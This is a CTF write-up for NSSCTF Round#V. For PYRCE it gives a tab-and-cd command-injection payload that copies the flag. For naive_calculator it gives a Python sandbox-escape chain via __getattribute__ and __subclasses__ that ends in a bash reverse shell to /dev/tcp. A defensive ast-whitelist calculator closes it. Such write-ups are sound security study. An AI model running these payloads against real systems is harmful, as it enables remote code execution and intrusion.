NSSCTF Round#V

PYRCE

My thinking is still not flexible enough QwQ

This challenge does not filter \t $ & ( ) , . : ? or any letters other than u and n.

So there is enough left to work with.

Spaces are bypassed with %09 (tab).

The / is bypassed with cd and $(pwd).

Then the contents of flag can be cp'd into app.py.

payload = "cp%09(cd%09..&&cd%09..&&cd%09..&&cd%09..&&cd%09..&&cd%09..&&echo%09(pwd)flag)%09app.py"

But I don't quite understand why the routes and everything are still there even though app.py has clearly been overwritten...

The official writeup does mkdir static and then copies /flag into it.

naive_calculator

import dis, sys

def pr(x, end='\n'):
    sys.stdout.write(str(x) + end)
    sys.stdout.flush()

pr("========================================")
pr("|           NAIVE CALCULATOR           |")
pr("----------------------------------------")
pr("|          Too simple, sometimes naive.|")
pr("========================================")
pr("")
pr("Sample input: a = 1 + 2")
pr("Sample output: a = 3")
pr("")

def check_code_object(code_info):
    # Reject any nested code object (lambda, comprehension, def, ...)
    for info_line in code_info:
        if 'code object' in info_line:
            pr("DON'T BE PUSSY")
            exit()

def check_names(code_info):
    # Reject a second entry in the Names table: only one name may be used
    for info_line in code_info[code_info.index('Names:'):]:
        if '1:' in info_line:
            pr('HAIYAA')
            exit()

if __name__ == '__main__':
    expr = input('> ')
    code_info = dis.code_info(expr).split('\n')

    print(dis.code_info(expr))

    check_code_object(code_info)

    if 'Names:' in code_info:
        check_names(code_info)

    exec(expr, {'__builtins__': None}, res:={})
    for LHS, RHS in res.items():
        pr(f"[!] {LHS} = {RHS}")

The dis module here is used to turn the Python source into bytecode information (dis.code_info).

The code logic is roughly: expr is executed dynamically, but it may only contain a single name (for example a.b, with a and b different, already counts as two names), and it may not contain an anonymous function (a nested code object).

And __builtins__ cannot be used.

The idea is to use __getattribute__ as the variable name, since __getattribute__ can also be used to fetch attribute values.

expr = ''

expr += "__getattribute__ = (None).__getattribute__('__class__');"

expr += "__getattribute__ = __getattribute__.__getattribute__(__getattribute__,'__base__');"
expr += "__getattribute__ = __getattribute__.__getattribute__(__getattribute__,'__subclasses__')();"

expr += "__getattribute__ = __getattribute__[132];"

expr += "__getattribute__ = __getattribute__.__getattribute__(__getattribute__,'__init__');"

expr += "__getattribute__ = __getattribute__.__getattribute__('__globals__');"
expr += "__getattribute__ = __getattribute__['popen']('bash -c \"bash -i >& /dev/tcp/ip/port 0>&1\"');"

print(expr)

__getattribute__ = (None).__getattribute__('__class__');
__getattribute__ = __getattribute__.__getattribute__(__getattribute__, '__base__');
__getattribute__.__getattribute__(__getattribute__.__getattribute__(__getattribute__.__getattribute__(__getattribute__, '__subclasses__')()[84](), 'load_module') ('os'), 'system') ('sh')
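As a contrast to the exec()-based checker above, here is an added example (not from the challenge or the original writeup) of a whitelist calculator built on the ast module: it accepts the same "a = 1 + 2" shape of input but rejects attribute access, calls, subscripts and dunder names, so none of the __getattribute__ chains above can even be expressed. The function names safe_calc and is_rejected are my own.

```python
import ast
import operator

# Constructed example: whitelist-based calculator with the same input shape
# as the challenge ("a = 1 + 2"), but it never calls exec().
# Pow is left out on purpose: a huge exponent would be a cheap DoS.
_BIN_OPS = {
    ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul,
    ast.Div: operator.truediv, ast.FloorDiv: operator.floordiv, ast.Mod: operator.mod,
}
_UNARY_OPS = {ast.UAdd: operator.pos, ast.USub: operator.neg}


def _eval(node, env):
    """Evaluate an expression node; anything outside the whitelist is rejected."""
    if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)) \
            and not isinstance(node.value, bool):
        return node.value
    if isinstance(node, ast.Name) and isinstance(node.ctx, ast.Load):
        if node.id not in env:
            raise ValueError(f"unknown variable {node.id!r}")
        return env[node.id]
    if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
        return _BIN_OPS[type(node.op)](_eval(node.left, env), _eval(node.right, env))
    if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY_OPS:
        return _UNARY_OPS[type(node.op)](_eval(node.operand, env))
    # Attribute, Call, Subscript, Lambda, ... all end up here, so the
    # __class__ / __base__ / __subclasses__ walk is never reachable.
    raise ValueError(f"disallowed syntax: {type(node).__name__}")


def safe_calc(source, env=None):
    """Run 'name = expression' statements and return the resulting variables."""
    env = dict(env or {})
    for stmt in ast.parse(source, mode="exec").body:
        if not (isinstance(stmt, ast.Assign) and len(stmt.targets) == 1
                and isinstance(stmt.targets[0], ast.Name)):
            raise ValueError("only 'name = expression' statements are allowed")
        name = stmt.targets[0].id
        if name.startswith("__"):
            raise ValueError(f"reserved name {name!r}")
        env[name] = _eval(stmt.value, env)
    return env


def is_rejected(source):
    """True if safe_calc refuses the input (helper for checking the filter)."""
    try:
        safe_calc(source)
    except (ValueError, SyntaxError):
        return True
    return False
```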


References

https://blog.csdn.net/Little_jcak/article/details/126594381
